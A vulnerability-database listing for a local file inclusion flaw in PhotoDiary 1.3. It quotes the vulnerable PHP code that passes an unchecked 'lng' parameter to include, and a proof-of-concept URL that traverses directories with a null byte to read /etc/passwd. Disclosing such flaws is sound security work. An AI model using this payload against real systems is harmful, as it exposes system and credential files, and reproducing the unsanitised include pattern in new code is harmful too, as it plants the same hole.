Lucene search
K

PhotoDiary 1.3 Local File Inclusion

🗓️ 01 Jan 2010 00:00:00Reported by cOndemnedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability, discovered by cOndemned, allows remote attackers to read arbitrary files via a crafted lng parameter to /admin/install.ph

Code
`PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability  
Discovered by cOndemned  
  
download: http://code.google.com/p/photodiary/  
  
  
source of /admin/install.php (lines 9 - 15):  
  
if (isset($_GET['lng'])){  
$LNG = $_GET['lng']; # 1  
} else {  
$LNG = "ITA";  
}  
  
include "../common/language_".$LNG.".php"; # 2  
  
  
proof of concept:  
  
http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation